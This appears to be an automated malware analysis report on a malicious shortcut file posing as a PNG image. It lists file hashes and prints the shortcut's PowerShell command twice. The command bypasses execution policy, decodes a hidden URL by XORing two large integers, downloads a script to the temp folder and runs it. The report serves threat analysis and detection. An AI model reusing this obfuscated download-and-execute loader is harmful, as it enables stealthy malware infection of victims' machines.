Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
cde7c6c5c307034cf66bb22f595a7308
Sha1
5438b5dd6ab76278ab71270fd69e11bdc61c1c73
Sha256
a5b4236c1cb73f74e699be14378ca9c623055cc7bccfe24bbcf20c5554c2435b
Sha384
ee876c899f6c2629374869351cf8ad8502e9ce7d07602644ddf5b7e52df3f4fe9bdb5337b5576e272793eb1f621b9734
Sha512
40aed34d538771fe068e13458e4739fee7b779a648088d35cd469b76f83e0f84637e10f41cf13bbb35ba05e5b7365d839894ddbbd7da06465548996988d525ae
SSDeep
48:9ahJjGDLBQ2xT6Nu3xxPxgyd87gRotZU7VSiQSEVkc3z:YKpQ2hFhxjdutZSSTVkc3z
TLSH
3F512A2EED0079B0C54305784AA90D0D667E634180D21FCA642D2E81AD9F3AE1BF6B8F
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -ep bypass -c "$d=[bigint]\"16051933424968457557552224499119\";$k=[bigint]\"13150934993480775299228704447705\";$r=$d -bxor $k;while($r -ne 0){$e+=[char]([int]($r -band 0xFF));$r=$r -shr 8};iwr $e -OutFile $env:TEMP\ngWstbL.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ngWstbL.ps1"

cde7c6c5c307034cf66bb22f595a7308 (2.5 KB)
No malware configuration was found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$d=[bigint]\"16051933424968457557552224499119\";$k=[bigint]\"13150934993480775299228704447705\";$r=$d -bxor $k;while($r -ne 0){$e+=[char]([int]($r -band 0xFF));$r=$r -shr 8};iwr $e -OutFile $env:TEMP\ngWstbL.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ngWstbL.ps1"

Malicious

cde7c6c5c307034cf66bb22f595a7308 > IMG-368331179.png.lnk
